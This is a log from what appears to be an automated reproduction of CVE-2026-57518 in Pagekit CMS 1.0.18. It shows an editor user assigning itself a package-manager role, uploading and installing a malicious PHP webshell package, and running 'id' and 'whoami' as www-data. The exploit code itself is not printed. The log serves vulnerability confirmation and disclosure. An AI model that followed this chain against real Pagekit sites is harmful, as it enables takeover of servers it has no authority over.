=== CVE-2026-57518 Pagekit CMS Privilege Escalation to RCE === Started: Sun Jul 5 14:02:16 UTC 2026 [*] Project cache dir: /data/pruva/project-cache/814e9433-2a24-4823-ba80-b9ed7134e121 [*] Using cached Pagekit release: /data/pruva/project-cache/814e9433-2a24-4823-ba80-b9ed7134e121/pagekit-release [*] Pagekit release at: /data/pruva/project-cache/814e9433-2a24-4823-ba80-b9ed7134e121/pagekit-release [*] Vulnerable code confirmed in UserApiController::saveAction() [*] Pagekit version 1.0.18 confirmed [*] Building Docker image... ---> 40e0ecc0a76a Successfully built 40e0ecc0a76a Successfully tagged pagekit-vuln-1018:repro [*] Docker image built: pagekit-vuln-1018:repro [*] Starting container... [*] Waiting for Apache to start... [*] Apache is ready [*] Step 1: Installing Pagekit via API (SQLite)... [*] DB check: {"status":"no-tables","message":""} [*] Install: {"status":"success","message":""} [*] Pagekit installed successfully (admin user created) [*] Step 2: Setting up roles and users as admin... [*] Admin session created (user_id=1) [*] Create Package Manager role: {"message":"success","role":{"id":4,"name":"Package Manager","priority":"3","permissions":["system: manage packages","system: access admin area"],"locked":false,"anonymous":false,"authenticated":false,"administrator":false}} [*] Package Manager role ID: 4 [*] Create User Manager role: {"message":"success","role":{"id":5,"name":"User Manager","priority":"4","permissions":["user: manage users"],"locked":false,"anonymous":false,"authenticated":false,"administrator":false}} [*] User Manager role ID: 5 [*] Create editor user: {"message":"success","user":{"id":2,"username":"editor","email":"editor@test.com","url":"","registered":"2026-07-05T14:02:18+00:00","status":1,"name":"Editor","login":null,"permissions":null,"roles":[2,5],"data":{}}} [*] Editor user ID: 2 [*] Step 3: PRIVILEGE ESCALATION — editor self-assigns Package Manager role... [*] Editor session created (user_id=2) [*] Editor BEFORE escalation: {"id":2,"username":"editor","email":"editor@test.com","url":"","registered":"2026-07-05T14:02:18+00:00","status":1,"name":"Editor","login":null,"permissions":null,"roles":[2,5],"data":{}} [*] Escalation response: {"message":"success","user":{"id":2,"username":"editor","email":"editor@test.com","url":"","registered":"2026-07-05T14:02:18+00:00","status":1,"name":"Editor","login":null,"permissions":null,"roles":[2,4],"data":{}}} [*] Editor AFTER escalation: roles="roles":[2,4] [*] PRIVILEGE ESCALATION CONFIRMED — editor now has 'system: manage packages' [*] Step 4: Uploading malicious PHP package... Created /tmp/malicious.zip (401 bytes) [*] Malicious ZIP created [*] Upload response: {"package":{"name":"pagekit\/shell","type":"pagekit-extension","version":"1.0.0","title":"Shell","description":"Shell extension","license":"MIT","module":"shell","shasum":"8790de9918a0addd1faf6964dd7e477be9e07b22"}} [*] Malicious package uploaded successfully [*] Step 5: Installing malicious package... [*] Install response (last lines): status=success HTTP:200 [*] Package installed successfully [*] Step 6: Triggering RCE via installed webshell... [*] RCE output (id): uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] RCE output (whoami): www-data [*] === RCE CONFIRMED === [*] Command 'id' returned: uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] Command 'whoami' returned: www-data [*] Evidence saved to /data/pruva/runs/4cba8383-95f2-477a-9a60-92cc4fdc9a31/bundle/logs/ [*] Runtime manifest written [*] Cleaning up container... [*] === REPRODUCTION SUCCESSFUL === [*] CVE-2026-57518 confirmed: privilege escalation to RCE in Pagekit CMS 1.0.18